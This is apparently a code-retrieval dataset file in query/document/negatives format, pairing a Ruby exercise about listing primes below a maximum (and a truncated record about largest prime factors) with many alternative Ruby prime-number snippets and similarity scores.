"0.7527415",
"0.75263965",
"0.7522764",
"0.7515699",
"0.75027055",
"0.7502592",
"0.7500298",
"0.7499518",
"0.74902105",
"0.7488516",
"0.748734",
"0.7486703",
"0.7486684",
"0.7485447"
] |
0.0
|
-1
|
Using your is_prime? method, write a new method, primes that takes a (nonnegative, integer) number max and returns an array of all prime numbers less than max.
|
def primes(max)
array = []
i = 2
while i < max
if is_prime?(i)
array << i
end
i += 1
end
array
end
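A minimal usage sketch (sample values are assumptions): primes returns every prime strictly less than max, so the upper bound itself is excluded.

primes(10)  # => [2, 3, 5, 7]
primes(8)   # => [2, 3, 5, 7] (7 < 8, so 7 is still included)
primes(2)   # => [] (there are no primes below 2)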
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def primes(max)\n primes = []\n number = 2\n \n while number <= max\n primes << number if is_prime? number\n number += 1\n end\n primes\nend",
"def primes(max)\n primes = []\n number = 2\n \n while number <= max\n primes << number if is_prime? number\n number += 1\n end\n primes\nend",
"def get_primes(limit)\n primes = []\n (2...limit).each do |number|\n primes << number if is_prime?(number)\n end\n primes\nend",
"def primes_less_than(num)\n arr = []\n (2...num).each do |el|\n if is_prime?(el)\n arr << el\n end\n end\n arr\nend",
"def GetPrimes (maximum)\n\t# Clear the input vector in case there is existing data\n\tprimes = []\n\t\n\t# There are no primes less than 2\n\tif (maximum < 2)\n\t\treturn\n\tend\n\t\n\t# Construct and execute the Sieve\n\tsqrtMaximum = Math.sqrt(maximum).to_i\n\tprimeTracker = Array.new(maximum,true)\n\t\n\tfor i in 2...sqrtMaximum\n\t\tif (!primeTracker[i])\n\t\t\tnext\n\t\tend\n\t\t\n\t\tfor j in ((i+i)...maximum).step(i)\n\t\t\tif (j < 0) # Guard against integer overflow\n\t\t\t\tbreak\n\t\t\tend\n\t\t\t\n\t\t\tprimeTracker[j] = false\n\t\tend\n\tend\n\t\n\treturn primeTracker\nend",
"def primes_less_than(num)\n res = []\n (2...num).each do |i|\n res.push(i) if is_prime?(i) == true\n end\n res\nend",
"def GetPrimes (maximum)\t\n\t# Construct and execute the Sieve\n\tsqrtMaximum = Math.sqrt(maximum).to_i\n\tprimeTracker = Array.new(maximum,true)\n\t\n\tfor i in 2...sqrtMaximum\n\t\tnext if !primeTracker[i]\n\t\t\n\t\tstart = i + i\n\t\t\n\t\tfor j in (start...maximum).step(i)\n\t\t\tprimeTracker[j] = false;\n\t\tend\n\tend\n\t\n\tprimes = []\n\t\n\t# Generate the list of primes to return\n\tfor k in 2...maximum\n\t\tprimes.push(k) if primeTracker[k]\n\tend\n\t\n\treturn primes\nend",
"def get_primes num\n primes = []\n for i in 0 ... num do\n if check_prime?(i) == true\n primes.push(i)\n end\n end\n p primes\nend",
"def getPrimes()\n oldlimit = $primelimit + 1\n $primelimit *= 2\n\n for i in oldlimit...$primelimit\n isPrime = true\n $primes.each do |p|\n if i % p == 0\n isPrime = false\n break\n end\n end\n if isPrime\n $primes << i\n end\n end\n\nend",
"def primes_up_to(max)\n repository = (0..max).collect{true} #=> Create flag array\n limit = (max ** 0.5) #=> establish search limit\n\n for index in 2..limit #=> search through flag aray\n next if !repository[index]\n num = (index * 2)\n while num <= max #=> unflag multiples of primes\n repository[num] = false\n num += index\n end\n end\n\n # => convert numbers into arrays\n primes = repository.collect.with_index do |flag, value|\n value if flag\n end\n\n # return cleaned array\n primes.shift\n primes.shift\n primes.compact\nend",
"def primes(num)\n\twhole_array = (2..num).to_a\n\tprime_array = [whole_array.shift]\n\n\tuntil whole_array == []\n\t\twhole_array.delete_if { |x| x % prime_array.last == 0 }\n\t\tprime_array << whole_array.shift\n\tend\n\tprime_array\nend",
"def primes\n return [] if max_prime < 2\n\n candidates.each do |prime,_|\n # skip numbers we already know NOT to be prime (from previous iterations)\n next if candidates[prime] != :prime\n\n # find the prime number candidates greater than the current prime number\n candidates.select { |n,_| candidates[n].eql?(:prime) && n > prime }\n .each do |num,_|\n # mark numbers evenly divisible by the current prime as NOT PRIME\n @candidates[num] = :not_prime if (num % prime) == 0\n end\n end\n\n # convert numbers still marked as prime to an array of numbers\n candidates.map { |num,value| num if value.eql? :prime }.compact\n end",
"def primes_less_than (num)\n arr=[]\n for n in 2..(num-1)\n if is_prime?(n)\n arr.push(n)\n end\n end\n p arr\n return arr\nend",
"def primes_below(n)\n a = 2\n output_array = []\n while a < n\n if is_prime?(a)\n output_array.push(a)\n end\n a = a + 1\n end\n return output_array\nend",
"def get_primes limit\n\tnums = (1...limit).select { |n| n.prime? }\n\n\tp nums\nend",
"def get_primes\n j = 0\n\n while j < @limit \n prime_number = is_prime\n if prime_number\n @prime_numbers.push(prime_number)\n j += 1\n end\n @count += 1\n end\n\n return @prime_numbers\n end",
"def GetPrimes (maximum)\n\t# Clear the input vector in case there is existing data\n\tprimes = []\n\t\n\t# There are no primes less than 2\n\tif (maximum < 2)\n\t\treturn\n\tend\n\t\n\t# Construct and execute the Sieve\n\tsqrtMaximum = Math.sqrt(maximum).to_i\n\tprimeTracker = Array.new(maximum,true)\n\t\n\tfor i in 2...sqrtMaximum\n\t\tif (!primeTracker[i])\n\t\t\tnext\n\t\tend\n\t\t\n\t\tfor j in ((i+i)...maximum).step(i)\n\t\t\tif (j < 0) # Guard against integer overflow\n\t\t\t\tbreak\n\t\t\tend\n\t\t\t\n\t\t\tprimeTracker[j] = false\n\t\tend\n\tend\n\t\n\t# Generate the list of primes to return\n\tfor k in 2...maximum\n\t\tif (primeTracker[k] == true)\n\t\t\tprimes.push(k)\n\t\tend\n\tend\n\t\n\treturn primes\nend",
"def GetPrimes (maximum)\n\t# Clear the input vector in case there is existing data\n\tprimes = []\n\t\n\t# There are no primes less than 2\n\tif (maximum < 2)\n\t\treturn\n\tend\n\t\n\t# Construct and execute the Sieve\n\tsqrtMaximum = Math.sqrt(maximum).to_i\n\tprimeTracker = Array.new(maximum,true)\n\t\n\tfor i in 2...sqrtMaximum\n\t\tif (!primeTracker[i])\n\t\t\tnext\n\t\tend\n\t\t\n\t\tfor j in ((i+i)...maximum).step(i)\n\t\t\tif (j < 0) # Guard against integer overflow\n\t\t\t\tbreak\n\t\t\tend\n\t\t\t\n\t\t\tprimeTracker[j] = false\n\t\tend\n\tend\n\t\n\t# Generate the list of primes to return\n\tfor k in 2...maximum\n\t\tif (primeTracker[k] == true)\n\t\t\tprimes.push(k)\n\t\tend\n\tend\n\t\n\treturn primes\nend",
"def GetPrimes (maximum)\n\t# Clear the input vector in case there is existing data\n\tprimes = []\n\t\n\t# There are no primes less than 2\n\tif (maximum < 2)\n\t\treturn\n\tend\n\t\n\t# Construct and execute the Sieve\n\tsqrtMaximum = Math.sqrt(maximum).to_i\n\tprimeTracker = Array.new(maximum,true)\n\t\n\tfor i in 2...sqrtMaximum\n\t\tif (!primeTracker[i])\n\t\t\tnext\n\t\tend\n\t\t\n\t\tfor j in ((i+i)...maximum).step(i)\n\t\t\tif (j < 0) # Guard against integer overflow\n\t\t\t\tbreak\n\t\t\tend\n\t\t\t\n\t\t\tprimeTracker[j] = false\n\t\tend\n\tend\n\t\n\t# Generate the list of primes to return\n\tfor k in 2...maximum\n\t\tif (primeTracker[k] == true)\n\t\t\tprimes.push(k)\n\t\tend\n\tend\n\t\n\treturn primes\nend",
"def primes\n range = (min..max).to_a\n primes = (min..max).to_a\n\n range.each do |mod|\n primes.delete_if do |num| \n composite?(num, mod) unless num == mod\n end\n range = primes\n end\n primes\n end",
"def prime(max)\n (1..max).select { |x| (1..max).count { |y| x % y == 0 } == 2 }\nend",
"def primes\n\t\t# primes = []\n\t\t# primes << 2\n\t\tprimes = [2] # combined previous two lines\n\t\tx = 3\n\n\t\tloop do\n\t\t\tbreak if primes.length == @n_primes # End loop when desired number has been calculated\n\t\t# while primes.length < @n_primes # Alternative 1 to loop do, break\n\t\t# until primes.length == @n_primes # Alternative 2 to loop do, break\n\t\t\ty = 3\n\t\t\ty += 2 until x % y == 0 # Loop to test if x is divisible by any odd number below it, y\n\t\t\tprimes << x if x == y # If the (odd) number was not divisible by any (odd) below itself, it is a prime\n\t\t\tx += 2\n\t\tend\n\n\t\treturn primes\n\tend",
"def get_primes(upper_bound)\n primes = []\n (2..upper_bound).each do |potential_prime|\n is_prime = true #default to true if the below loop doesn't prove it false\n (2..(potential_prime - 1)).each do |divisor| #we start from 2 because that is the first number\n #that we know is not prime - 1 is there so we don't divide the number by itself because\n #we know that it is possible\n if potential_prime % divisor == 0\n is_prime = false\n break\n end\n end\n\n #HERE - we know if is_prime is true, it must be prime\n if is_prime\n primes << potential_prime #this is how you get all the numbers to the max number\n end\nend\n\n return primes\nend",
"def prime_numbers(range)\n ar = range.to_a\n ar2 = [nil, nil] + [true] * ar.size\n\n i = 2\n while i <= Math.sqrt(ar.max).to_i\n if ar2[i]\n z = i * i\n while z <= ar.max\n ar2[z] = false\n z += i\n end\n end\n i += 1\n end\n ar.delete_if { |e| ar2[e] == nil || ar2[e] == false }\nend",
"def prime(number)\n prime_numbers = []\n (2..number).each do |current_number|\n if is_prime? current_number\n prime_numbers << current_number\n end\n end\n return prime_numbers\nend",
"def pretentious_primes(arr, num)\n new_arr = []\n if num > 0\n arr.each do |ele|\n i = ele + 1\n count = 0\n while true\n if is_prime?(i)\n count += 1\n end\n if count == num\n new_arr << i\n break\n end\n i += 1\n end\n end\n else\n num = -1 * num\n end\n new_arr\nend",
"def all_primes(number)\n primes = []\n (2...number).each do |num|\n if prime?(num)\n primes << num \n end\n end\n primes\nend",
"def primes_less_than(num)\n require 'prime'\n arr = []\n Prime.each(num) do |prime| arr.push(prime)\n end\n num.prime? ? arr.pop : arr\n return arr\n end",
"def largest_prime(num)\n\tresult = []\n\ti = 2\n\twhile i <= num\n\t\tif is_prime?(i)\n\t\t\tif num % i == 0 # Check for whole number if % by i \n\t\t\t\tnum = num / i # Update the num\n\t\t\t\tresult << i # Add i to the array\n\t\t\t\ti = 2 # Reset i to 2\t\n\t\t\tend\t\n\t\tend\n\t\ti += 1\t\n\tend\n\tresult\nend",
"def primes (n)\n return (1..n).select { |x| x.prime? }\nend",
"def primes\n return [] if self == 0\n return \"don't do that\" if self < 0\n list = [2]\n test = 3\n until list.length == self\n list << test if test.is_prime?\n test += 2\n end\n list\n end",
"def prime (n)\n\n\t#create an Array\n\tprime_num = []\n\n\tfor num in (2..n)\n\t\tis_prime = factors(num)\n\t\tif (is_prime.length ==2)\n\t\t\tprime_num.push(num)\n\t\tend\n\tend\n\treturn prime_num\nend",
"def primes(max)\n yield \"See Primes below: \"\n parray= []\n Prime.each(max) do |p|\n parray << p\n end\n print parray\nend",
"def anti_prime?(num)\n max = 0\n sum_i_array = []\n (1..num).each do |n|\n sum_i = 0\n (1..n).each { |i| sum_i += 1 if n % i == 0 }\n sum_i_array << sum_i\n end\n sum_i_array[-1] == sum_i_array.max\nend",
"def primes_less_than(num)\n\toutput = []\n\t(2...num).each do |n|\n\t\toutput << n if is_prime?(n)\n\tend\n\toutput\nend",
"def primes()\n return [] if @number < 2\n # build Boolean array to use for sieve with buffer to align indices\n sieve_array = Array.new(2, false) + Array.new(@number-1, true)\n # perform Sieve of Eratosthenes eliminations\n (2..Math.sqrt(@number).to_i).each do |i|\n (i**2..@number).step(i) {|j| sieve_array[j] = false} if sieve_array[i] == true\n end\n # return numbers by corresponding index that are still true\n (2..@number).collect {|index| index if sieve_array[index] == true}.compact\n end",
"def find_primes(num,prime_array=[])\n i = 2\n until num % i == 0 \n i += 1\n end\n prime_array << i\n return prime_array if num == i\n find_primes(num/i, prime_array) \nend",
"def pretentious_primes(arr, num)\nend",
"def sieve(n)\n # initialize an empty array (this will store all primes between 2 and n)\n prime_array = []\n for i in 2..n\n if(is_prime(i))\n # if 'i' is a prime number, add it to the array\n prime_array.push(i)\n end\n end\n # finally, we'll return our array of prime numbers\n return prime_array\nend",
"def primes(n) \n max = Math::sqrt(n).truncate\n (2..max).each {|val|\n if n % val == 0 then\n p val\n primes(n/val)\n return\n elsif val == max then\n p n\n return\n end\n }\nend",
"def find_prime_numbers(num)\n\tarr =[]\n (2..num).each{|x| arr.push(x)}\n\n i = 0\n p = arr[i]\n\n while p != arr[-1]\n\t arr.delete_if{|n| n%p == 0 && n != p}\n\t i+= 1\n\t p = arr[i]\n end\n return arr\nend",
"def prime_list(number_of_primes)\n return [] if number_of_primes < 1\n prime_numbers = Array.new\n for num in 2..9999999 do\n if is_prime_num(num, prime_numbers)\n prime_numbers.push(num)\n break if prime_numbers.length == number_of_primes\n end\n end\n return prime_numbers\n end",
"def compute_primes\n nums = (@max_checked..@max_checked * 2).map { |x| x.odd? ? x : nil }.to_a\n 1.upto(@primes.index { |p| p * p > @max_checked * 2 }) do |i|\n start_idx = -@max_checked % @primes[i] # prime[i]'s 1st multiple's index\n\n (start_idx..nums.size).step(@primes[i]) { |x| nums[x] = nil }\n end\n @max_checked *= 2\n @primes += nums.compact\n end",
"def primes (n)\r\n primes = Array.new(n) { |index| index+=1 }\r\n return primes.select { |x| factors(x).length == 2 }\r\nend",
"def prime_number(n)\n res = []\n prime = Array.new(n + 1, true)\n (2..n).each do |x|\n num = x * x\n break if num > n\n\n if prime[x]\n (num..n).step(x).each do |multiples|\n prime[multiples] = false\n end\n end\n end\n \n (2..n).each do |primes|\n res << primes if prime[primes]\n end\n res\nend",
"def find_primes(input)\n\t\n\tprimes = Array.new\n\t\n\tlimit = Math.sqrt(input)\n\t\n\tnumber_to_test = 2\n\t\n\tif number_to_test > limit\n\t\treturn Array[input]\n\tend\n\t\n\twhile input % number_to_test != 0 && number_to_test < limit\n\t\tnumber_to_test += 1\n\tend\n\t\n\tif input % number_to_test == 0\n\t\treturn find_primes(number_to_test) + find_primes(input/number_to_test)\n\tend\n\n\treturn Array[input]\n\t\t\nend",
"def find_primes(input)\n\t\n\tprimes = Array.new\n\t\n\tlimit = Math.sqrt(input)\n\t\n\tnumber_to_test = 2\n\t\n\tif number_to_test > limit\n\t\treturn Array[input]\n\tend\n\t\n\twhile input % number_to_test != 0 && number_to_test < limit\n\t\tnumber_to_test += 1\n\tend\n\t\n\tif input % number_to_test == 0\n\t\treturn find_primes(number_to_test) + find_primes(input/number_to_test)\n\tend\n\n\treturn Array[input]\n\t\t\nend",
"def ruby_prime(n1, n2)\n prime_numbers = []\n (n1..n2).each do |num|\n if Prime.prime?(num)\n prime_numbers << num\n end\n end\n prime_numbers\nend",
"def primes\n arr=Array.new\n arr[1]=false\n (2..1000).each {|i| arr[i]=true}\n (2..1000).each {|i| (i/2).floor\n (2..1000).each {|j| (j/i).floor\n arr[i*j] = false\n }}\n for i in 1..1000\n if arr[i] == true\n puts i\n end\n end\nend",
"def primes (number)\n primes_array = []\n Prime.each(number) do |p|\n primes_array.push(p)\n end\n\n primes_array\nend",
"def prime_num_gen( array_size )\n\n # array_size == array.length\n\n array = []\n\n divisors = []\n\n i = 0\n while( array_size != array.length )\n\n # p i\n\n if( i >= 2 ) # 0 and 1 are not prime\n\n if( i == 2 ) # two is a prime\n # p \" 2 is pushed\"\n array.push(i)\n end\n\n if( i % 2 != 0 ) # prime numbers cannot be even\n\n # p \" i #{i}\"\n # p \" divisors #{divisors}\"\n\n # START extra check - if i has more than 2 divisors\n #\n # IMPROVEMENT!!!!\n #\n # Could have simply called is_prime?( i ) --> returns true if prime\n # if is_prime? ? array.push(i) : p \"do nothing\"\n #\n j = 1\n while( i >= j )\n\n #p \" j #{j}\"\n\n if( i % j == 0)\n\n divisors.push(j)\n # p \" divisors #{divisors}\"\n end #if\n\n j += 1\n end # while\n\n if( divisors.length == 2 ) # prime should have 1 and itself as divisors\n array.push(i)\n # p \"#{i} is pushed\"\n end\n\n divisors.clear\n # p divisors\n\n # END of extra check\n #\n # extra check - if i has more than 2 divisors\n\n end # if (prime numbers cannot be even)\n\n end # if outter most\n\n i += 1\n end # while\n\n p array\n return array\n\nend",
"def first_n_primes(n)\n\n #unless n.is_a? Integer\n # return \"n must be an integer.\"\n #end\n return \"n must be an integer.\" unless n.is_a? Integer\n\n #if n <= 0\n # return \"n must be greater than 0.\"\n #end\n return \"n must be greater than 0.\" if n <= 0\n \n #prime_array = [] if prime_array.nil?\n prime_array ||= []\n \n prime = Prime.new\n #for num in (1..n)\n # prime_array.push(prime.next)\n #end\n # n.times { prime_array.push(prime.next) }\n n.times { prime_array << prime.next }\n \n #return prime_array\n prime_array # implicit return!\n\nend",
"def smallest_prime_factors(max)\n arr = Array.new(max+1)\n for n in 2...arr.count\n next if arr[n] # n.prime?\n for i in (n...arr.count).step(n)\n arr[i] = n unless arr[i]\n end\n end\n arr\nend",
"def specific_prime(n)\n\na = (2..n) # list of integers 2 through \nprimes = Array.new\n\nprimes = a.select { |x| (2..Math.sqrt(x)).none? { |d| (x % d).zero? }}\n\nputs primes[10000]\n# answer => 104,743\n\nend",
"def select_primes(array)\n array.select { |num| is_prime?(num) }\nend",
"def prime?(num)\r\n # your code goes here\r\n prime = []\r\n\r\n for i in 1 .. num\r\n if num % i == 0\r\n prime << i\r\n end\r\n end\r\n prime.length == 2\r\nend",
"def prime_factors(num)\n arr = []\n (1...num).each do |number|\n if is_prime(number) && num % number == 0\n arr << number\n end\n end\n return arr\nend",
"def primes\n Prime::EratosthenesGenerator.new.take_while {|i| i <= @base}\n end",
"def prime_factors(num)\n arr = []\n\tPrime.each(num) { |prime| num % prime == 0 ? arr.push(prime) : false }\n return arr\nend",
"def getMaxPrime(numb)\n def isPrime(n)\n return false if n <= 1\n 2.upto(Math.sqrt(n).to_i) do |x|\n return false if n%x == 0\n end\n true\n end\n\n primes = []\n (2..10000).each { |x| primes << x if isPrime(x) }\n \n max = 0\n primes.each do |i|\n if numb % i == 0\n max = i\n end\n end\n puts max\nend",
"def primes_array(options = {})\n limit = options[:limit] || ARRAY_DEFAULT_LIMIT\n field = Array.new(limit+1, true)\n # sieve the number field\n 3.step(field.size / 2, 2) do |k|\n (3 * k).step(field.size, 2 * k) do |n|\n field[n] = false\n end\n end\n \n # collect the field into an array, starting with 3\n primes = [ 2 ]\n 3.step(field.size, 2) do |n|\n primes << n if field[n] \n end\n primes\n end",
"def squared_primes(array)\n array.find_all{|x| (2..x-1).select(){|i| x % i == 0}.count == 0 && x > 1}.map{|p| p*p}\n\n\n # primes = []\n # array.each do |x|\n # 2.upto(x-1) do |i|\n # if x % i == 0 && x > 2\n # primes << x*x\n # end\n # end\n # end\n # primes\n\n # primes= []\n # array.find_all do |x|\n # if x == 2\n # primes << 2*2\n # end\n\n # if x > 2 && (x % 2 != 0)\n # #(2..x-1).select()\n # # if x % 2 != 0 && x > 1\n # #{|i| x % i == 0}\n # #x.count == 0 && x > 1\n # primes << x * x\n # #end\n # end\n # end\n # # new_array.map{|p| p*p}\n # primes\nend",
"def anti_prime?(n)\n div_arr = []\n (1..n).each do |num|\n div_arr << num_divisors(num) \n end\n return true if div_arr.max == div_arr[-1]\n return false\nend",
"def prime_factors(num)\n arr = factors(num)\n new_arr = []\n arr.each do |n|\n new_arr << n if prime?(n)\n end\n new_arr\nend",
"def primeArray(number)\n @sieve = Array.new(number)\n \n for count in 2..Math.sqrt(number)\n next if @sieve[count]\n \n for inner_count in 2..number/count\n @sieve[count * inner_count] = true\n end\n end\n @sieve\nend",
"def prime_numbers(num)\n all_factors = factors(num)\n only_prime = []\n i = 0\n while i < all_factors.length\n if prime?(all_factors[i])\n only_prime += all_factors[i]\n end\n i += 1\n end\n only_prime\n end",
"def find_primes(int1, int2)\n nums = (int1..int2).to_a\n nums.select { |num| is_prime?(num) }\nend",
"def prime?(number)\n a = []\n n = (2...number).to_a\n if number == 1 || number == 0 || number.negative?\n false\n else\n n.collect {|x| a << number % x}\n if a.include?(0)\n false\n else\n true\n end\n end\n # (2...number).to_a.each {|x| (number/x).integer? ? false : true}\nend",
"def primes_less_than(n)\n arr = []\n n-=1\n while n>1 do\n if is_prime?(n)\n arr << n\n end\n n-=1\n end\n arr.sort\nend",
"def primes_upto( xmax )\n # primes have no factors except for 1 and self\n primes = [ 2 ]\n ( 3..xmax ).each do |i|\n puts i if 0 == ( i % 1000 )\n is_prime = true\n primes.each do |p|\n break if p > ( i / 2 )\n if 0 == ( i % p )\n is_prime = false\n break\n end\n end # p\n primes << i if is_prime\n end # i\n return primes\nend",
"def pick_primes(numbers)\n\tprimes = []\n \tnumbers.each do |num| \n \tif isPrime(num) \n \tprimes.push(num)\n end\n end\n \treturn primes\nend",
"def prime_sieve(limit)\n \n limitn = limit+1\n primes = []\n \n # Fill in prime truth table\n for i in 0..limitn do\n primes[i] = true\n end\n \n primes[0] = false\n primes[1] = false\n \n primes.each_with_index{|prime,i|\n unless i < 2\n range = Range.new(i*i,limitn)\n range.step(i) {|index| primes[index] = false}\n end\n }\n \n true_primes = []\n primes.each_with_index{|value,i|\n true_primes << i if value == true\n }\n \n return true_primes\n \nend",
"def primesInRange(low, high)\n\n\t# Compute all primes smaller or equal to\n\t# square root of high using simple sieve\n\n\tlimit = (Math.sqrt(high)) + 1;\n\tsimpleSieve(limit);\n\n\t# Count of elements in given range\n\tn = high - low + 1;\n\n\t# Declaring boolean only for [low, high]\n \tmark = initArray((n+1));\n\n\t# Use the found primes by\n\t# simpleSieve() to find\n\t# primes in given range\n\t$prime.each_with_index do |val, i|\n\t\t# Find the minimum number in [low..high] that is\n\t\t# a multiple of prime[i] (divisible by prime[i])\n\t\tloLim = low / val * val\n\t\tif loLim < low\n\t\t\tloLim += val;\n\t\tend\n\t\tif loLim==val\n\t\t\tloLim += val;\n\t\tend\n\n\t# Mark multiples of prime[i] in [low..high]:\n\t#\tWe are marking j - low for j, i.e. each number\n\t#\tin range [low, high] is\tmapped to [0, high - low]\n\t#\tso if range is [50, 100] marking 50 corresponds\n\t#\tto marking 0, marking 51 corresponds to 1 and\n\t#\tso on.\n # Also if the current j is prime don't mark\n\t#\tit as true.In this way we need to allocate space only\n\t#\tfor range\n\tj = loLim;\n\t\tuntil j > high do\n\t\t if j != val\n\t\t mark[j - low] = true;\n\t\t end\n\t\t j += val\n\t\tend\n\tend\n\n\t# Numbers which are not marked\n\t# in range, are prime\n\to = []\n\tfor i in low..high do\n if mark[i - low]==false\n o.push(i);\n end\n end\n puts(\"[OUTPUT] %s\" % o.join(\",\"));\nend",
"def prime_range(min, max)\n\nend",
"def eratosthenes_sieve(max_number)\n numbers = (0..max_number+1).to_a\n bound = Math.sqrt(max_number).to_i\n\n (2..bound+1).each do |current|\n if numbers[current]\n (current+current..max_number+1).step(current).each do |j| numbers[j] = nil end\n end\n end\n\n return numbers.compact![2..-1]\nend",
"def prime?(int)\r\n\r\n arr = [] # empty array to store results\r\n\r\n i = 4 # modulo of 4 for ints 1, 2 and 3 are never zero\r\n while i < int # iteration to check\r\n arr << i if int % i == 0\r\n i += 1\r\n end\r\n\r\n arr.length == 0 # result \"true/false\"\r\nend",
"def is_prime?(a)\n max = a -1\n [*(2..max)].each do |val|\n if a % val == 0\n return false\n end\n end\n true\n end",
"def prime?(num)\n if num <= 1\n false\n elsif num == 2 || num == 3\n true\n elsif num > 3\n list_array = (2..num-1).to_a\n list_array.none? { |i| num % i == 0 }\n end\nend",
"def prime_number(n)\n prime_array = []\n count = 1\n until prime_array.length == n\n if count == 1\n prime_array << 2\n count += 2\n elsif is_prime?(count) == true\n prime_array << count\n count += 2\n else\n count += 2\n end\n end\n prime_array.last\nend",
"def isPrime?(num)\n return false if num < 2\n\n (2...num).each { |factor| return false if num % factor == 0}\n\n true\nend",
"def isprime?(num)\n\n return false if num<2\n\n (2...num).each do |factor|\n return false if num % factor == 0\n end\n\n return true\n\nend",
"def squared_primes(array)\n# array.find_all {|x| (2..x-1).select(){|i| x % i == 0 }.count == 0 }.map{|p| p*p}\n# Select only primes from array\n\tprime = array.find_all do |x|\n\t\t\t\t \t(2..x-1).select do |i|\n\t\t\t\t \t\tx % i == 0\n\t\t\t\t \tend\n\t\t\t\t \t.count == 0\n\t\t\t\t\tend\n# Square the selected primes and over write the initial array \n return prime.map {|p| p*p}\n \nend",
"def prime_factors(num)\n array = []\n (1..num).each do |number|\n array << number if prime?(number) && num % number == 0\n end\n array.sort!\nend",
"def pick_primes(numbers)\n numbers.select { | n | is_prime(n) }\nend",
"def pick_primes(numbers)\r\n return numbers.select { |num| prime?(num)}\r\nend",
"def primes(top)\n n = 2\n primes = []\n loop do\n primes << n if (2..Math.sqrt(n)).all? {|x| n % x != 0 }\n return primes.last if primes.count == top\n n += 1\n end\nend",
"def sieve_of_eratosthenes(max)\n if max < 1 || !(max.is_a?(Integer))\n raise TypeError.new \"the number given must be an integer greater than zero\"\n end\n\n root = Integer.sqrt(max)\n primes = Array.new(max + 1) { |i| i.odd? || i == 2 } #every prime number other than 2 is an odd number.\n\n #to find all the prime numbers until max, it will be enough just to perform the sifting only by the prime numbers, which do not exceed the root of max.\n 3.step(root, 2).each do |i|\n next unless primes[i] # next if not initialized as prime\n #i*i, i*i+i, i*i+2i, i*i+3i\n (i * i).step(max, i) do |j|\n primes[j] = false\n end\n end\n\n #Select all prime numbers\n 2.upto(max).select { |i| primes[i] }\nend",
"def prime?(primes,x)\n lim = Math.sqrt(x)\n primes.each do |p|\n return true if p > lim\n return false if x % p == 0\n end\n return true\nend",
"def primes_less_than number\n ps = (2..number).each\n primes_so_far = []\n enum = Enumerator.new do |y|\n loop do\n p = ps.next\n non_prime = false\n\n p_root = (p**0.5).floor\n # Filter for primes using an inverted version of the sieve of\n # Eratosthenes--a number is prime if it's not divisible by the primes\n # less than it's square root.\n primes_so_far.each {|prime|\n if prime > p_root\n # if p has no divisors in primes_so_far less than p^0.5\n # then p must be prime\n break\n elsif p % prime == 0\n # the current p is not prime\n non_prime = true\n break\n end\n }\n\n unless non_prime\n primes_so_far.push p\n y.yield p\n end\n end\n end\n\n enum.to_a\n\nend",
"def is_prime?(num)\n return false if num == 1 #added gaurd clause after watching walkthrough\n (2..(num - 1)).select do |x| #refactored to remove range variable\n return false if num % x == 0\n end\n return true #moved the this return to solve is_prime?(2) while watching video\nend",
"def find_primes\n canidates = (0..@max_num).to_a\n k=2\n while(k<= canidates.size/2)\n j=2\n while(j<= canidates.size/2)\n prod = k*j\n if prod <= @max_num\n canidates[prod] = nil\n end\n j+=1\n end\n k+=1\n end\n res = canidates.compact\n res.shift(2)\n res\n end",
"def primes(num)\n \nend",
"def primes(num)\n \nend",
"def primes(num)\n \nend",
"def primes(num)\n \nend",
"def pick_primes(numbers)\n numbers.select { |num| prime?(num) }\nend",
"def prime_numbers\n # start with the first prime number\n primes = [2]\n # find the rest of the prime numbers\n (2..1000).each do |i|\n add_next_prime_number(primes)\n end\n return primes\nend",
"def is_prime?(num)\n # Write your code here\n # (1..num).select { |element| num % element == 0 }.length == 2 ? true : false\n\n return false if num < 2\n\n (2...num).each do |factor|\n if num % factor == 0\n return false\n end\n end\n return true\nend",
"def pick_primes(numbers)\n return numbers.select { |num| prime?(num)}\nend",
"def is_prime?(num)\n return false if num <= 1\n\n (2...num).each do |fact|\n return false if num % fact == 0\n end\n\n true\nend"
] |
[
"0.83949995",
"0.83949995",
"0.8016834",
"0.7953333",
"0.7952573",
"0.78910017",
"0.78560436",
"0.7841761",
"0.78091115",
"0.78061825",
"0.78059363",
"0.7792239",
"0.7710655",
"0.7699948",
"0.76808125",
"0.76653236",
"0.7654771",
"0.7654771",
"0.7654771",
"0.75961375",
"0.7559373",
"0.75291616",
"0.75243264",
"0.7486323",
"0.7468632",
"0.74616057",
"0.7452698",
"0.73809785",
"0.73729825",
"0.735041",
"0.7343364",
"0.7339515",
"0.7335261",
"0.7330846",
"0.7329084",
"0.7319689",
"0.73078823",
"0.7295502",
"0.7279627",
"0.7266765",
"0.723547",
"0.7230819",
"0.7224456",
"0.72076565",
"0.72014487",
"0.7199867",
"0.7199867",
"0.7193629",
"0.7174334",
"0.71709913",
"0.715567",
"0.71537316",
"0.7152749",
"0.7123376",
"0.71190906",
"0.71042836",
"0.7077767",
"0.70665973",
"0.70508856",
"0.70281065",
"0.7023829",
"0.70226556",
"0.7014978",
"0.70006895",
"0.6991797",
"0.69907314",
"0.6988749",
"0.6960299",
"0.69592774",
"0.6958428",
"0.6948659",
"0.69464284",
"0.69421273",
"0.69329214",
"0.6931158",
"0.6929275",
"0.69266766",
"0.6922709",
"0.6913232",
"0.6912049",
"0.6893453",
"0.6889751",
"0.6887555",
"0.68791026",
"0.6878495",
"0.6873528",
"0.68717384",
"0.6866335",
"0.68656665",
"0.6863504",
"0.68606424",
"0.6858261",
"0.6858261",
"0.6858261",
"0.6858261",
"0.68513167",
"0.6849174",
"0.6848442",
"0.6847705",
"0.68473995"
] |
0.86498326
|
0
|
write a recursive function to find the highest prime factor of any number
|
def prime_recur(num)
  return nil if num < 2          # no prime factors below 2
  return num if is_prime?(num)   # a prime is its own highest prime factor
  # strip off the smallest divisor and recurse on the quotient;
  # the recursion bottoms out at the largest prime factor
  factor = 2
  factor += 1 until num % factor == 0
  prime_recur(num / factor)
end
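A usage sketch for the corrected method (example values are illustrative; 13195 is the usual worked example for prime factorization):

prime_recur(13195)  # => 29, since 13195 = 5 * 7 * 13 * 29
prime_recur(17)     # => 17, a prime is its own highest prime factor
prime_recur(1)      # => nil (no prime factors below 2)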
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def largest_prime_factor(num)\n (2..num).reverse_each do |factor|\n if (num % factor == 0 && Prime.prime?(factor))\n return factor\n end\n end\nend",
"def largest_prime_factor(num)\n track = 0\n (num).downto(2).each do |factor|\n \n if num % factor == 0 && prime?(factor)\n return factor\n end\n end\n \nend",
